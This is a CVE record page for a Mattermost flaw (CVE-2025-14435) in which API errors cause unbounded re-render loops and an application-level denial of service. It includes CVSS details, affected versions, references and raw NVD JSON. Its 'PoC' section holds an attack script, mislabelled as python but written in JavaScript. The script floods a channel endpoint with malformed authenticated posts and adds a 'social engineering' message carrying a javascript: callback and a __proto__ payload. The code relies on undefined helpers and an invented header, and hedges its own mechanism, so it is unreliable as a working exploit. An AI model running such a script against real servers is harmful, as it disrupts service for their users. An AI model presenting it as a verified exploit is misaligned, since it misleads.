CVE-2025-14435

Description

Mattermost versions 10.11.x <= 10.11.8, 11.1.x <= 11.1.1, 11.0.x <= 11.0.6 fail to prevent infinite re-renders on API errors which allows authenticated users to cause application-level DoS via triggering unbounded component re-render loops.

CVSS Details

CVSS Score

6.8

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:* - VULNERABLE

Mattermost 10.11.x <= 10.11.8

Mattermost 11.1.x <= 11.1.1

Mattermost 11.0.x <= 11.0.6

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-14435 PoC - Trigger Infinite Re-render via API Error Loop // This PoC demonstrates how an authenticated user can trigger unbounded re-render loops const sleep = (ms) => new Promise(resolve => setTimeout(resolve, ms)); async function triggerReRenderLoop(targetChannelId) { console.log('[+] Starting infinite re-render attack for CVE-2025-14435'); // Step 1: Authenticate with Mattermost const authToken = await authenticate('[email protected]', 'password123'); // Step 2: Target a specific channel to trigger the re-render vulnerability const targetUrl = `${MATTERMOST_API_BASE}/channels/${targetChannelId}/posts`; let requestCount = 0; const maxRequests = 10000; while (requestCount < maxRequests) { try { // Send malformed request to trigger API error const response = await fetch(targetUrl, { method: 'POST', headers: { 'Authorization': `Bearer ${authToken}`, 'Content-Type': 'application/json', 'X-Custom-Header': 'trigger_error' // Custom header to trigger error path }, body: JSON.stringify({ // Malformed data to trigger error handling message: '', // Empty message may trigger validation error file_ids: ['A'.repeat(1000)] // Potentially invalid file ID }) }); if (!response.ok) { // Error response may trigger infinite re-render loop in vulnerable versions console.log(`[+] Error triggered: ${response.status} at request ${requestCount}`); // The error response combined with component state update triggers re-render } requestCount++; await sleep(10); // Small delay between requests } catch (error) { console.log(`[+] Exception caught: ${error.message}`); // Network errors combined with retry logic may intensify re-render } } console.log('[+] Attack completed - target should experience DoS condition'); } // Alternative: Social Engineering approach - trick user into triggering the bug async function socialEngineeringPoC() { // Create a malicious message with embedded trigger const maliciousPayload = { message: 'Click here to view important update', props: { // Malformed props that trigger API error on interaction callback_url: 'javascript:void(0)', __proto__: { poll: { invalid: true } } } }; // Post to target channel await postMessage(CHANNEL_ID, maliciousPayload); console.log('[+] Malicious message posted - waiting for victim interaction'); } // Run the PoC triggerReRenderLoop(CHANNEL_ID);

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-14435
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-14435
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-14435/
[4] VulDB https://vuldb.com/cve/CVE-2025-14435
[5] https://mattermost.com/security-updates

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-14435", "sourceIdentifier": "[email protected]", "published": "2026-01-16T12:15:49.583", "lastModified": "2026-01-20T15:06:30.110", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mattermost versions 10.11.x <= 10.11.8, 11.1.x <= 11.1.1, 11.0.x <= 11.0.6 fail to prevent infinite re-renders on API errors which allows authenticated users to cause application-level DoS via triggering unbounded component re-render loops."}, {"lang": "es", "value": "Las versiones de Mattermost 10.11.x <= 10.11.8, 11.1.x <= 11.1.1, 11.0.x <= 11.0.6 no impiden las re-renderizaciones infinitas en errores de API, lo que permite a usuarios autenticados causar un DoS a nivel de aplicación mediante el desencadenamiento de bucles de re-renderización de componentes ilimitados."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:N/A:H", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 4.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.11.0", "versionEndExcluding": "10.11.9", "matchCriteriaId": "2C87F454-776F-471C-8719-3434C715A1AC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.0.0", "versionEndExcluding": "11.0.7", "matchCriteriaId": "F49BC4E6-A956-4FB4-B674-5C8915543B28"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.1.0", "versionEndExcluding": "11.1.2", "matchCriteriaId": "06F4B62A-AEF6-410C-BB99-830F39E33794"}]}]}], "references": [{"url": "https://mattermost.com/security-updates", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}